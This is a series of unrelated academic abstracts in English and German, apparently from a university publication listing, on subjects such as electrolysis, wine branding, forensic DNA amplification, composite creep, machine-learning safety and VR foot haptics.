While PEM water electrolysis could be a favourable technique for in situ sanitization with ozone, its application is mainly limited to the use of ultrapure water to achieve a sufficient long-time stability. As additional charge carriers influence the occurring transport phenomena, we investigated the impact of different feed water qualities on the performance of a PEM tap water electrolyser for ozone evolution. The permeation of water and the four most abundant cations (Na+, K+, Ca2+, Mg2+) is characterised during stand-by and powered operation at different charge densities to quantify underlying transport mechanisms. Water transport is shown to linearly increase with the applied current (95 ± 2 mmol A−1 h−1) and occurs decoupled from ion permeation. A limitation of ion permeation is given by the transfer of ions in water to the anode/PEM interface. The unstabilized operation of a PEM electrolyser in tap water leads to a pH gradient which promotes the formation of magnesium and calcium carbonates and hydroxides on the cathode surface. The introduction of a novel auxiliary cathode in the anolytic compartment has shown to suppress ion permeation by close to 20%.
Purpose: Both Hungary and Germany belong to the old-world wine-producing countries and have long winemaking traditions. This paper aims at exploring and comparing online branding strategies of family SME (small and medium sized enterprises) wineries at Lake Balaton (Hungary) and Lake Constance (Germany), as two wine regions with similar geographic characteristics.
Design/methodology/approach: This paper, based on a total sample of 37 family wineries, 15 at Lake Balaton and 22 at Lake Constance, investigates the differences in brand identity on the website, brand image in social media and online communication channels deployed in both wine regions. The study applies a qualitative methodology using MaxQDA software for conducting content analysis of texts in websites and social media. Descriptive statistics and t-test were conducted to compare the usage of different communication channels and determine statistical significance.
Findings: At Lake Balaton, the vineyard, the winery and the family, while at Lake Constance, the lake itself and the grape are highlighted regarding family winery brand identity. The customer-based brand image of Hungarian family wineries emphasizes wine, food and service, with the predominant use of Facebook. In the German family wineries, the focus of brand identity is on wine, friendliness and taste and includes more extensive usage of websites.
Originality/value: The paper deploys a novel methodology, both in terms of tools used as well as geographic focus to uncover online branding patterns of family wineries, thereby providing implications for wine and tourism industries at lake regions. It compares the share of selected most-used words in the overall text in websites and in social media, and presents the key findings from this innovative approach.
Modern PCR-based analytical techniques have reached sensitivity levels that allow for obtaining complete forensic DNA profiles from even tiny traces containing genomic DNA amounts as small as 125 pg. Yet these techniques have reached their limits when it comes to the analysis of traces such as fingerprints or single cells. One suggestion to overcome these limits has been the usage of whole genome amplification (WGA) methods. These methods aim at increasing the copy number of genomic DNA and by this means generate more template DNA for subsequent analyses. Their application in forensic contexts has so far remained mostly an academic exercise, and results have not shown significant improvements and even have raised additional analytical problems. Until very recently, based on these disappointments, the forensic application of WGA seems to have largely been abandoned. In the meantime, however, novel improved methods are pointing towards a perspective for WGA in specific forensic applications. This review article tries to summarize current knowledge about WGA in forensics and suggests the forensic analysis of single-donor bioparticles and of single cells as promising applications.
Shaping off-job life is becoming increasingly important for workers to increase and maintain their optimal functioning (i.e., feeling and performing well). Proactively shaping the job domain (referred to as job crafting) has been extensively studied, but crafting in the off-job domain has received markedly less research attention. Based on the Integrative Needs Model of Crafting, needs-based off-job crafting is defined as workers’ proactive and self-initiated changes in their off-job lives, which target psychological needs satisfaction. Off-job crafting is posited as a possible means for workers to fulfill their needs and enhance well-being and performance over time. We developed a new scale to measure off-job crafting and examined its relationships to optimal functioning in different work contexts in different regions around the world (the United States, Germany, Austria, Switzerland, Finland, Japan, and the United Kingdom). Furthermore, we examined the criterion, convergent, incremental, discriminant, and structural validity evidence of the Needs-based Off-job Crafting Scale using multiple methods (longitudinal and cross-sectional survey studies, an “example generation”-task). The results showed that off-job crafting was related to optimal functioning over time, especially in the off-job domain but also in the job domain. Moreover, the novel off-job crafting scale had good convergent and discriminant validity, internal consistency, and test–retest reliability. To conclude, our series of studies in various countries show that off-job crafting can enhance optimal functioning in different life domains and support people in performing their duties sustainably. Therefore, shaping off-job life may be beneficial in an intensified and continually changing and challenging working life.
Nanomedicine strategies were first adapted and successfully translated to clinical application for diseases, such as cancer and diabetes. These strategies would no doubt benefit unmet diseases needs as in the case of leishmaniasis. The latter causes skin sores in the cutaneous form and affects internal organs in the visceral form. Treatment of cutaneous leishmaniasis (CL) aims at accelerating wound healing, reducing scarring and cosmetic morbidity, preventing parasite transmission and relapse. Unfortunately, available treatments show only suboptimal effectiveness and none of them were designed specifically for this disease condition. Tissue regeneration using nano-based devices coupled with drug delivery are currently being used in clinic to address diabetic wounds. Thus, in this review, we analyse the current treatment options and attempt to critically analyse the use of nanomedicine-based strategies to address CL wounds in view of achieving scarless wound healing, targeting secondary bacterial infection and lowering drug toxicity.
Der vorliegende Beitrag setzt sich mit der Bedeutung von Lernorten der beruflichen Bildung im Zuge einer BBNE sowie der diesbezüglichen Kompetenzentwicklung auseinander. Dabei wird entlang des BIBB-Modellversuchs „NAUZUBI“ ein möglicher Ansatz skizziert, der darauf ausgerichtet ist, eine integrative Kompetenzentwicklung in Nachhaltigkeitsthemen zu ermöglichen. Ausgangspunkt sind dabei betriebliche Nachhaltigkeitsaudits, die im vorliegenden Ansatz als kontextualisierte Zugänge für berufliche Lernanlässe dienten. Diese wurden in aufeinander abgestimmten Schritten im betrieblichen und schulischen Lernen reflektiert. Im Beitrag werden das Grundkonzept sowie die entsprechenden Umsetzungserfahrungen beschrieben. Es werden ferner Herausforderungen und Potenziale für das betriebliche, berufsschulische und das lernortkooperative Lernen und damit die integrative Kompetenzentwicklung dargestellt.
Recent advances in Natural Language Processing have substantially improved contextualized representations of language. However, the inclusion of factual knowledge, particularly in the biomedical domain, remains challenging. Hence, many Language Models (LMs) are extended by Knowledge Graphs (KGs), but most approaches require entity linking (i.e., explicit alignment between text and KG entities). Inspired by single-stream multimodal Transformers operating on text, image and video data, this thesis proposes the Sophisticated Transformer trained on biomedical text and Knowledge Graphs (STonKGs). STonKGs incorporates a novel multimodal architecture based on a cross encoder that uses the attention mechanism on a concatenation of input sequences derived from text and KG triples, respectively. Over 13 million so-called text-triple pairs, coming from PubMed and assembled using the Integrated Network and Dynamical Reasoning Assembler (INDRA), were used in an unsupervised pre-training procedure to learn representations of biomedical knowledge in STonKGs. By comparing STonKGs to an NLP- and a KG-baseline (operating on either text or KG data) on a benchmark consisting of eight fine-tuning tasks, the proposed knowledge integration method applied in STonKGs was empirically validated. Specifically, on tasks with a comparatively small dataset size and a larger number of classes, STonKGs resulted in considerable performance gains, beating the F1-score of the best baseline by up to 0.083. Both the source code as well as the code used to implement STonKGs are made publicly available so that the proposed method of this thesis can be extended to many other biomedical applications.
Guzzo et al. (Reference Guzzo, Schneider and Nalbantian2022) argue that open science practices may marginalize inductive and abductive research and preclude leveraging big data for scientific research. We share their assessment that the hypothetico-deductive paradigm has limitations (see also Staw, Reference Staw2016) and that big data provide grand opportunities (see also Oswald et al., Reference Oswald, Behrend, Putka and Sinar2020). However, we arrive at very different conclusions. Rather than opposing open science practices that build on a hypothetico-deductive paradigm, we should take initiative to do open science in a way compatible with the very nature of our discipline, namely by incorporating ambiguity and inductive decision-making. In this commentary, we (a) argue that inductive elements are necessary for research in naturalistic field settings across different stages of the research process, (b) discuss some misconceptions of open science practices that hide or discourage inductive elements, and (c) propose that field researchers can take ownership of open science in a way that embraces ambiguity and induction. We use an example research study to illustrate our points.
Modeling of Creep Behavior of Particulate Composites with Focus on Interfacial Adhesion Effect
(2022)
Evaluation of creep compliance of particulate composites using empirical models always provides parameters depending on initial stress and material composition. The effort spent to connect model parameters with physical properties has not resulted in success yet. Further, during the creep, delamination between matrix and filler may occur depending on time and initial stress, reducing an interface adhesion and load transfer to filler particles. In this paper, the creep compliance curves of glass beads reinforced poly(butylene terephthalate) composites were fitted with Burgers and Findley models providing different sets of time-dependent model parameters for each initial stress. Despite the finding that the Findley model performs well in a primary creep, the Burgers model is more suitable if secondary creep comes into play; they allow only for a qualitative prediction of creep behavior because the interface adhesion and its time dependency is an implicit, hidden parameter. As Young’s modulus is a parameter of these models (and the majority of other creep models), it was selected to be introduced as a filler content-dependent parameter with the help of the cube in cube elementary volume approach of Paul. The analysis led to the time-dependent creep compliance that depends only on the time-dependent creep of the matrix and the normalized particle distance (or the filler volume content), and it allowed accounting for the adhesion effect. Comparison with the experimental data confirmed that the elementary volume-based creep compliance function can be used to predict the realistic creep behavior of particulate composites.
Approximately 45% of global greenhouse gas emissions are caused by the construction and use of buildings. Thermal insulation of buildings in the current context of climate change is a well-known strategy to improve the energy efficiency of buildings. The development of renewable insulation material can overcome the drawbacks of widely used insulation systems based on polystyrene or mineral wool. This study analyzes the sustainability and thermal conductivity of new insulation materials made of Miscanthus x giganteus fibers, foaming agents, and alkali-activated fly ash binder. Life cycle assessments (LCA) are necessary to perform benchmarking of environmental impacts of new formulations of geopolymer-based insulation materials. The global warming potential (GWP) of the product is primarily determined by the main binder component sodium silicate. Sodium silicate's CO2 emissions depend on local production, transportation, and energy consumption. The results, which have been published during recent years, vary in a wide range from 0.3 kg to 3.3 kg CO2-eq. kg-1. The overall GWP of the insulation system based on Miscanthus fibers, with properties according to current thermal insulation regulations, reaches up to 95% savings of CO2 emissions compared to conventional systems. Carbon neutrality can be achieved through formulations containing raw materials with carbon dioxide emissions and renewable materials with negative GWP, thus balancing CO2 emissions.
Die folgenden Überlegungen versuchen einerseits, die Arbeit an einer ins besondere medienwissenschaftlich fundierten Auslegung der sogenannten Kriminalliteratur1 weiter zu denken und in den Zusammenhang einer Lektüre zu stellen, die das Dispositiv ›Literatur und ihre Medien‹ als Bezugnahme bzw. Verhältnismäßigkeit versteht: als »Verhältnis der Literatur zu ihren Medien« und/oder als »Verhältnis der Medien zur Literatur«.2
Die Medikalisierungs- und die Kompressionsthese sind zwei „konkurrierende“ Ansätze in Bezug auf die Frage, in welchem Gesundheitszustand ein längeres Leben, insbesondere die Lebensjahre in höherem Alter verbracht werden. Neben der individuellen Bedeutung von Quantität und Qualität der Lebensjahre ist die Relevanz dieser Frage für das Gesundheitswesen hoch, denn nicht nur in der Vergangenheit ist die Zahl bzw. auch der Anteil der älteren Menschen gestiegen, es wird im Kontext des demografischen Wandels ein weiterer Anstieg, auch der Lebenserwartung, prognostiziert – und die Auswirkungen auf die Versorgungsbedarfe bzw. Ausgaben im Gesundheitswesen können beträchtlich sein.
Medien-›Eingriffe‹
(2022)
Intention: Within the research project EnerSHelF (Energy-Self-Sufficiency for Health Facilities in Ghana), i. a. energy-meteorological and load-related measurement data are collected, for which an overview of the availability is to be presented on a poster.
Context: In Ghana, the total electricity consumed has almost doubled between 2008 and 2018 according to the Energy Commission of Ghana. This goes along with an unstable power grid, resulting in power outages whenever electricity consumption peaks. The blackouts called "dumsor" in Ghana, pose a severe burden to the healthcare sector. Innovative solutions are needed to reduce greenhouse gas emissions and improve energy and health access.
We benchmark the robustness of maximum likelihood based uncertainty estimation methods to outliers in training data for regression tasks. Outliers or noisy labels in training data results in degraded performances as well as incorrect estimation of uncertainty. We propose the use of a heavy-tailed distribution (Laplace distribution) to improve the robustness to outliers. This property is evaluated using standard regression benchmarks and on a high-dimensional regression task of monocular depth estimation, both containing outliers. In particular, heavy-tailed distribution based maximum likelihood provides better uncertainty estimates, better separation in uncertainty for out-of-distribution data, as well as better detection of adversarial attacks in the presence of outliers.
BACKGROUND: Humans demonstrate many physiological changes in microgravity for which long-duration head down bed rest (HDBR) is a reliable analog. However, information on how HDBR affects sensory processing is lacking.
OBJECTIVE: We previously showed [25] that microgravity alters the weighting applied to visual cues in determining the perceptual upright (PU), an effect that lasts long after return. Does long-duration HDBR have comparable effects?
METHODS: We assessed static spatial orientation using the luminous line test (subjective visual vertical, SVV) and the oriented character recognition test (PU) before, during and after 21 days of 6° HDBR in 10 participants. Methods were essentially identical as previously used in orbit [25].
RESULTS: Overall, HDBR had no effect on the reliance on visual relative to body cues in determining the PU. However, when considering the three critical time points (pre-bed rest, end of bed rest, and 14 days post-bed rest) there was a significant decrease in reliance on visual relative to body cues, as found in microgravity. The ratio had an average time constant of 7.28 days and returned to pre-bed-rest levels within 14 days. The SVV was unaffected.
CONCLUSIONS: We conclude that bed rest can be a useful analog for the study of the perception of static self-orientation during long-term exposure to microgravity. More detailed work on the precise time course of our effects is needed in both bed rest and microgravity conditions.
Vor dem Hintergrund der Covid-19-Pandemie hat sich das Home-Office in Deutschland seit dem Jahr 2020 weit verbreitet und wird seitdem bei vielen Arbeitgebern als neue Arbeitsmethode genutzt. Der Einsatz von Home-Office kann verschiedene positive als auch negative Effekte auf die Beschäftigten und den Arbeitgeber sowie die Gesellschaft allgemein haben. Damit von möglichst vielen positiven Effekten profitiert werden kann, ist ein gutes Home-Office Konzept erforderlich. Welche Anforderungen an ein solches Konzept bestehen und welche Voraussetzungen grundlegend mit der Nutzung von Home-Office verbunden sind, wird in dem Beitrag aufgezeigt. Dabei werden von technischen bis hin zu sozialen Aspekten Anforderungen verschiedener Arten berücksichtigt, welche durch eine durch den Autor durchgeführte Studie gebildet worden sind. Im Fokus dieses Beitrages sollen die kritischen Erfolgsfaktoren für das ideale Arbeiten im Home-Office stehen, also die Anforderungen, welche ausschlaggebend für die erfolgreiche Umsetzung eines Home-Office Konzeptes sind und Einfluss auf die wahrgenommenen Effekte des Home-Office haben. Die im Beitrag aufgeführte Studie des Autors wurde im Rahmen der Abschlussarbeit von Herrn Jeske durchgeführt, auf welcher der Beitrag basiert.
Die vorliegende Arbeit befasst sich mit der Entwicklung eines Schaltungskonzepts und Labormusters einer externen Beleuchtung für den Einsatz in der Forschung an Time-of-Flight (ToF) Kameras mit Amplitude-Modulated Continuous Wave (AMCW)-Verfahren. Die externe Beleuchtung stellt einen leistungsstarken Repeater der internen Beleuchtung einer ToF Kamera dar und ist in der Lage die von ToF Kameras genutzten hochfrequenten Rechtecksignale zu emittieren.
Da von ToF Kameras in der Regel kein elektrisches Steuersignal (Triggersignal) für den Einsatz einer externen Beleuchtung zur Verfügung gestellt wird, wird dieses aus dem optischen Signal der ToF Kamera gewonnen. Dafür wird ein Konzept für einen optischen Detektor (Trigger) vorgestellt. Dieser setzt sich aus einer Photodiode, einem Transimpedanzverstärker und einer anschließenden Signalaufbereitung zusammen. Außerdem wird gezeigt, wie eine schnelle externe Beleuchtung mit hoher Strahlungsleistung mithilfe eines Metal-Oxid-Semiconductor Field-Effekt-Transistor (MOSFET) und vier Vertical-Cavitiy Surface-Emitting Laser (VCSEL) umgesetzt werden kann. Dafür werden mit der Serien- und Parallelschaltung von MOSFET und VCSEL zwei Schaltungskonzepte vorgestellt. Als Lichtquellen kommen VCSEL mit einer für ToF Kameras typischen Wellenlänge von 940 nm im Nahinfraroten (NIR) zum Einsatz.
Es konnte gezeigt werden, dass mit dem optischen Trigger Signale von bis zu 100 MHz in elektrische Ausgangssignale gewandelt werden können. Außerdem wurden rechteckige Triggersignale mit Anstiegszeiten von 650 ps und Abfallzeiten von 440 ps erzielt. Mit der externen Beleuchtung konnten Signale mit bis zu 100 MHz emittiert werden. Es wurden im Zusammenspiel mit dem optischen Trigger optische Signale mit Anstiegszeiten von 1,5 ns und Abfallzeiten von 960 ps erreicht. Dabei konnten Strahlungsleistungen von knapp 7 W erzielt werden. Das gesamte System aus optischem Trigger und externer Beleuchtung weist eine Latenz von 16 ns auf. Als Ergebnis dieser Arbeit konnte ein System aufgebaut werden, das aufgrund der erzielten Ergebnisse höchstwahrscheinlich als externe Beleuchtung zu Forschungszwecken mit verschiedenen ToF Kameras eingesetzt werden kann. Außerdem besteht die Möglichkeit den optischen Trigger und die Beleuchtung separat zu nutzen.
In Unterkünften für geflüchtete Menschen lebt ein hoher Anteil Kinder in einem Umfeld, das häufig für Erwachsene geschaffen wurde und/oder von diesen dominiert wird. Die Beschaffenheit, die Struktur und das Zusammenleben vor Ort bestimmen daher wesentlich die Lebenswelten von Kindern. Dabei haben Kinder besondere Rechte und Bedarfe. Der Schutz von Kindern und ein förderliches Umfeld für eine gute Entwicklung sind wesentliche Aspekte, die durch internationale Abkommen, wie die UN-Kinderrechtskonvention verbrieft sind und umgesetzt werden müssen. Zwar sind die Bundesländer im nationalen gesetzlichen Rahmen dazu verpflichtet, den Schutz von Kindern in Unterkünften für geflüchtete Menschen zu gewährleisten, die Umsetzung ist jedoch oft nicht verbindlich geregelt. Die vorliegende Analyse diskutiert kinderrechtliche Aspekte für den Schutz von Kindern in Unterkünften für geflüchtete Menschen, zudem wirft sie einen Blick auf Aktivitäten und Maßnahmen der Bundesinitiative Schutz von geflüchteten Menschen in Flüchtlingsunterkünften initiiert durch das Bundesministerium für Familien, Senioren, Frauen und Jugend (BMFSFJ) und dem Kinderhilfswerk der Vereinten Nationen (UNICEF) und gibt Einblick in die neueste Sekundärliteratur zum Kinderschutz in Sammelunterkünften. Ziel des Beitrags ist es, aufzuzeigen, welche Aspekte den Schutz von Kindern begünstigen und wo die Herausforderungen liegen.
Jahresbericht 2021
(2022)
The electricity grid of the future will be built on renewable energy sources, which are highly variable and dependent on atmospheric conditions. In power grids with an increasingly high penetration of solar photovoltaics (PV), an accurate knowledge of the incoming solar irradiance is indispensable for grid operation and planning, and reliable irradiance forecasts are thus invaluable for energy system operators. In order to better characterise shortwave solar radiation in time and space, data from PV systems themselves can be used, since the measured power provides information about both irradiance and the optical properties of the atmosphere, in particular the cloud optical depth (COD). Indeed, in the European context with highly variable cloud cover, the cloud fraction and COD are important parameters in determining the irradiance, whereas aerosol effects are only of secondary importance.
The cube in cube approach was used by Paul and Ishai-Cohen to model and derive formulas for filler content dependent Young's moduli of particle filled composites assuming perfect filler matrix adhesion. Their formulas were chosen because of their simplicity, and recalculated using an elementary volume approach which transforms spherical inclusions to cubic inclusions. The EV approach led to expression of the composites moduli that allows introducing an adhesion factor kadh ranging from 0 and 1 to take into account reduced filler matrix adhesion. This adhesion factor scales the edge length of the cubic inclusions, thus reducing the stress transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh for PA66, PBT, PP, PE-LD and BR which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds [Formula: see text] and depends on the ratio of matrix modulus and filler modulus. The modified model allows for a quick calculation of any particle filled composites for known matrix modulus EM, filler modulus EF, filler volume content vF and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of any particle filled polymer parts as well as materials selection are significantly eased. FEA of cubic and hexagonal EV arrangements show that stress distributions within the EV exhibit more shear stresses if one deviates from the cubic arrangement. At high filler contents the assumption that the property of the EV is representative for the whole composite, holds only for filler volume contents up to 15 or 20% (corresponding to 30 to 40 weight %). Thus, for vast majority of commercially available particulate composites, the modified model can be applied. Furthermore, this indicates that the cube in cube approach reaches two limits: (i) the occurrence of increasing shear stresses at filler contents above 20% due to deviations of EV arrangements or spatial filler distribution from cubic arrangements (singular), and (ii) increasing interaction between particles with the formation of particle network within the matrix violating the EV assumption of their homogeneous dispersion.
Contract-based nature protection schemes are a voluntary mechanism, with a limited contract duration, that aim to raise the acceptance of biodiversity conservation practices in agriculture among farmers and other land users. The purpose of this paper is to analyse the institutional settings of contract-based nature protection based on the– “Institutions of Sustainability” (IoS) framework in the German Rhine-Sieg district, and to outline the way in which policy measures should be designed to encourage farmers to participate in contract-based nature protection programmes. This was achieved by answering research questions to identify the challenges, potentials and obstacles of a contract-based nature protection scheme in different “sub-arenas” as defined in the IoS framework. Qualitative research methods were used as the methodology. The analysis shows that main constraints for sufficient implementation of contract-based nature protection schemes are the limited consideration of the impact of climate change during the contract period, the limited consideration of regional conditions as regards the measures taken on the ground and an inflexible contract duration.
Deployment of modern data-driven machine learning methods, most often realized by deep neural networks (DNNs), in safety-critical applications such as health care, industrial plant control, or autonomous driving is highly challenging due to numerous model-inherent shortcomings. These shortcomings are diverse and range from a lack of generalization over insufficient interpretability and implausible predictions to directed attacks by means of malicious inputs. Cyber-physical systems employing DNNs are therefore likely to suffer from so-called safety concerns, properties that preclude their deployment as no argument or experimental setup can help to assess the remaining risk. In recent years, an abundance of state-of-the-art techniques aiming to address these safety concerns has emerged. This chapter provides a structured and broad overview of them. We first identify categories of insufficiencies to then describe research activities aiming at their detection, quantification, or mitigation. Our work addresses machine learning experts and safety engineers alike: The former ones might profit from the broad range of machine learning topics covered and discussions on limitations of recent methods. The latter ones might gain insights into the specifics of modern machine learning methods. We hope that this contribution fuels discussions on desiderata for machine learning systems and strategies on how to help to advance existing approaches accordingly.
This study investigates the initial stage of the thermo-mechanical crystallization behavior for uni- and biaxially stretched polyethylene. The models are based on a mesoscale molecular dynamics approach. We take constraints that occur in real-life polymer processing into account, especially with respect to the blowing stage of the extrusion blow-molding process. For this purpose, we deform our systems using a wide range of stretching levels before they are quenched. We discuss the effects of the stretching procedures on the micro-mechanical state of the systems, characterized by entanglement behavior and nematic ordering of chain segments. For the cooling stage, we use two different approaches which allow for free or hindered shrinkage, respectively. During cooling, crystallization kinetics are monitored: We precisely evaluate how the interplay of chain length, temperature, local entanglements and orientation of chain segments influence crystallization behavior. Our models reveal that the main stretching direction dominates microscopic states of the different systems. We are able to show that crystallization mainly depends on the (dis-)entanglement behavior. Nematic ordering plays a secondary role.
Bonding wires made of aluminum are the most used materials for the transmission of electrical signals in power electronic devices. During operation, different cyclic mechanical and thermal stresses can lead to fatigue loads and a failure of the bonding wires. A prediction or prevention of the wire failure is not yet possible by design for all cases. The following work presents meaningful fatigue tests in small wire dimensions and investigates the influence of the R-ratio on the lifetime of two different aluminum wires with a diameter of 300 μm each. The experiments show very reproducible fatigue results with ductile failure behavior. The endurable stress amplitude decreases linearly with an increasing stress ratio, which can be displayed by a Smith diagram, even though the applied maximum stresses exceed the initial yield stresses determined by tensile tests. A scaling of the fatigue results by the tensile strength indicates that the fatigue level is significantly influenced by the strength of the material. Due to the very consistent findings, the development of a generalized fatigue model for predicting the lifetime of bonding wires with an arbitrary loading situation seems to be possible and will be further investigated.
West Africa has great potential for the use of solar energy systems, as it has both a high solar radiation rate and a lack of energy production. West Africa is a very aerosol-rich region, whose effects on photovoltaic (PV) use are due to both atmospheric conditions and existing solar technology. This study reports the variability of aerosol optical properties in the city of Koforidua, Ghana over the period 2016 to 2020, and their impact on the radiation intensity and efficiency of a PV cell. The study used AERONET ground (Giles et al., 2019) and satellite data produced by CAMS (Gschwind, et al., 2019), which both provide aerosol optical depth (AOD) and metrological parameters used for radiative transfer calculations with libRadtran (Emde, et al., 2016). A spectrally resolved PV model (Herman-Czezuch et al., 2022) is then used to calculate the PV yield of two PV technologies: polycrystalline and amorphous silicon. It is observed that for both data sets, the aerosol is mainly composed of dust and organic matter, with a very increased AOD load during the harmattan period (December-February), also due to the fires observed during this period.
While many proteins are known clients of heat shock protein 90 (Hsp90), it is unclear whether the transcription factor, thyroid hormone receptor beta (TRb), interacts with Hsp90 to control hormonal perception and signaling. Higher Hsp90 expression in mouse fibroblasts was elicited by the addition of triiodothyronine (T3). T3 bound to Hsp90 and enhanced adenosine triphosphate (ATP) binding of Hsp90 due to a specific binding site for T3, as identified by molecular docking experiments. The binding of TRb to Hsp90 was prevented by T3 or by the thyroid mimetic sobetirome. Purified recombinant TRb trapped Hsp90 from cell lysate or purified Hsp90 in pull-down experiments. The affinity of Hsp90 for TRb was 124 nM. Furthermore, T3 induced the release of bound TRb from Hsp90, which was shown by streptavidin-conjugated quantum dot (SAv-QD) masking assay. The data indicate that the T3 interaction with TRb and Hsp90 may be an amplifier of the cellular stress response by blocking Hsp90 activity.
Hydrogen‐Bonded Cholesteric Liquid Crystals—A Modular Approach Toward Responsive Photonic Materials
(2022)
A supramolecular approach for photonic materials based on hydrogen-bonded cholesteric liquid crystals is presented. The modular toolbox of low-molecular-weight hydrogen-bond donors and acceptors provides a simple route toward liquid crystalline materials with tailor-made thermal and photonic properties. Initial studies reveal broad application potential of the liquid crystalline thin films for chemo- and thermosensing. The chemosensing performance is based on the interruption of the intermolecular forces between the donor and acceptor moieties by interference with halogen-bond donors. Future studies will expand the scope of analytes and sensing in aqueous media. In addition, the implementation of the reported materials in additive manufacturing and printed photonic devices is planned.
Cathepsin K (CatK) is a target for the treatment of osteoporosis, arthritis, and bone metastasis. Peptidomimetics with a cyanohydrazide warhead represent a new class of highly potent CatK inhibitors; however, their binding mechanism is unknown. We investigated two model cyanohydrazide inhibitors with differently positioned warheads: an azadipeptide nitrile Gü1303 and a 3-cyano-3-aza-β-amino acid Gü2602. Crystal structures of their covalent complexes were determined with mature CatK as well as a zymogen-like activation intermediate of CatK. Binding mode analysis, together with quantum chemical calculations, revealed that the extraordinary picomolar potency of Gü2602 is entropically favoured by its conformational flexibility at the nonprimed-primed subsites boundary. Furthermore, we demonstrated by live cell imaging that cyanohydrazides effectively target mature CatK in osteosarcoma cells. Cyanohydrazides also suppressed the maturation of CatK by inhibiting the autoactivation of the CatK zymogen. Our results provide structural insights for the rational design of cyanohydrazide inhibitors of CatK as potential drugs.
Schulungen in neun Prozessschritten gestalten! Digitalisierung des Masterfaches „Integrierte Managementsysteme“ im Studiengang „Material Science and Sustainability Methods“ im Fachbereich Naturwissenschaften an der Hochschule Bonn-Rhein-Sieg. Am Beispiel einer jahrelang in Präsenz gelehrten Lehrveranstaltung mit Vorlesungen und seminaristischen Übungen wird gezeigt, wie das Gestalten und Durchführen zur Vermittlung prüfungsrelevanter Kompetenzen auch „online“ gelingt. Das passende „Setting“ des Lehr- und Lernprozesses unter Beachtung von Qualitätskriterien und Handlungsempfehlungen ist für jede Art von Schulung in Universitäten, Behörden, Unternehmen und anderen Organsitationen relevant.
High-dimensional and multi-variate data from dynamical systems such as turbulent flows and wind turbines can be analyzed with deep learning due to its capacity to learn representations in lower-dimensional manifolds. Two challenges of interest arise from data generated from these systems, namely, how to anticipate wind turbine failures and how to better understand air flow through car ventilation systems. There are deep neural network architectures that can project data into a lower-dimensional space with the goal of identifying and understanding patterns that are not distinguishable in the original dimensional space. Learning data representations in lower dimensions via non-linear mappings allows one to perform data compression, data clustering (for anomaly detection), data reconstruction and synthetic data generation.
In this work, we explore the potential that variational autoencoders (VAE) have to learn low-dimensional data representations in order to tackle the problems posed by the two dynamical systems mentioned above. A VAE is a neural network architecture that combines the mechanisms of the standard autoencoder and variational bayes. The goal here is to train a neural network to minimize a loss function defined by a reconstruction term together with a variational term defined as a Kulback-Leibler (KL) divergence.
The report discusses the results obtained for the two different data domains: wind turbine time series and turbulence data from computational fluid dynamics (CFD) simulations.
We report on the reconstruction, clustering and unsupervised anomaly detection of wind turbine multi-variate time series data using a variant of a VAE called Variational Recurrent Autoencoder (VRAE). We trained a VRAE to cluster normal and abnormal wind turbine series (two class problem) as well as normal and multiple abnormal series (multi-class problem). We found that the model is capable of distinguishing between normal and abnormal cases by reducing the dimensionality of the input data and projecting it to two dimensions using techniques such as Principal Component Analysis (PCA) and t-distributed stochastic neighbor embedding (t-SNE). A set of anomaly scoring methods is applied on top of these latent vectors in order to compute unsupervised clustering. We have achieved an accuracy of up to 96% with the KM eans + + algorithm.
We also report the data reconstruction and generation results of two dimensional turbulence slices corresponding to CFD simulation of a HVAC air duct. For this, we have trained a Convolutional Variational Autoencoder (CVAE). We have found that the model is capable of reconstructing laminar flows up to a certain degree of resolution as well generating synthetic turbulence data from the learned latent distribution.
In the field of automatic music generation, one of the greatest challenges is the consistent generation of pieces continuously perceived positively by the majority of the audience since there is no objective method to determine the quality of a musical composition. However, composing principles, which have been refined for millennia, have shaped the core characteristics of today's music. A hybrid music generation system, mlmusic, that incorporates various static, music-theory-based methods, as well as data-driven, subsystems, is implemented to automatically generate pieces considered acceptable by the average listener. Initially, a MIDI dataset, consisting of over 100 hand-picked pieces of various styles and complexities, is analysed using basic music theory principles, and the abstracted information is fed into explicitly constrained LSTM networks. For chord progressions, each individual network is specifically trained on a given sequence length, while phrases are created by consecutively predicting the notes' offset, pitch and duration. Using these outputs as a composition's foundation, additional musical elements, along with constrained recurrent rhythmic and tonal patterns, are statically generated. Although no survey regarding the pieces' reception could be carried out, the successful generation of numerous compositions of varying complexities suggests that the integration of these fundamentally distinctive approaches might lead to success in other branches.
From Conclusion to Coda
(2022)
The visual and auditory quality of computer-mediated stimuli for virtual and extended reality (VR/XR) is rapidly improving. Still, it remains challenging to provide a fully embodied sensation and awareness of objects surrounding, approaching, or touching us in a 3D environment, though it can greatly aid task performance in a 3D user interface. For example, feedback can provide warning signals for potential collisions (e.g., bumping into an obstacle while navigating) or pinpointing areas where one’s attention should be directed to (e.g., points of interest or danger). These events inform our motor behaviour and are often associated with perception mechanisms associated with our so-called peripersonal and extrapersonal space models that relate our body to object distance, direction, and contact point/impact. We will discuss these references spaces to explain the role of different cues in our motor action responses that underlie 3D interaction tasks. However, providing proximity and collision cues can be challenging. Various full-body vibration systems have been developed that stimulate body parts other than the hands, but can have limitations in their applicability and feasibility due to their cost and effort to operate, as well as hygienic considerations associated with e.g., Covid-19. Informed by results of a prior study using low-frequencies for collision feedback, in this paper we look at an unobtrusive way to provide spatial, proximal and collision cues. Specifically, we assess the potential of foot sole stimulation to provide cues about object direction and relative distance, as well as collision direction and force of impact. Results indicate that in particular vibration-based stimuli could be useful within the frame of peripersonal and extrapersonal space perception that support 3DUI tasks. Current results favor the feedback combination of continuous vibrotactor cues for proximity, and bass-shaker cues for body collision. Results show that users could rather easily judge the different cues at a reasonably high granularity. This granularity may be sufficient to support common navigation tasks in a 3DUI.
Der Befall mit schädlichen Pilzen führt im Weinbau zu Ertragseinbusen sowie zu ökonomischen und ökologischen Belastungen durch den präventiven Einsatz von Fungiziden. Diese könnten durch eine Früherkennung des Befalls verringert werden. Das Projekt vinoLAS® soll die kontaktlose Früherkennung des falschen Mehltaus, einer wichtigen schädlichen Pilzart im Weinbau, ermöglichen. Dabei sollen Methoden der laserinduzierten Fluoreszenzspektroskopie verwendet werden. In dieser Arbeit wird ein Detektionsmodul zur Analyse des laserinduziertem Fluoreszenzlichts in vier spektralen Kanälen entwickelt.
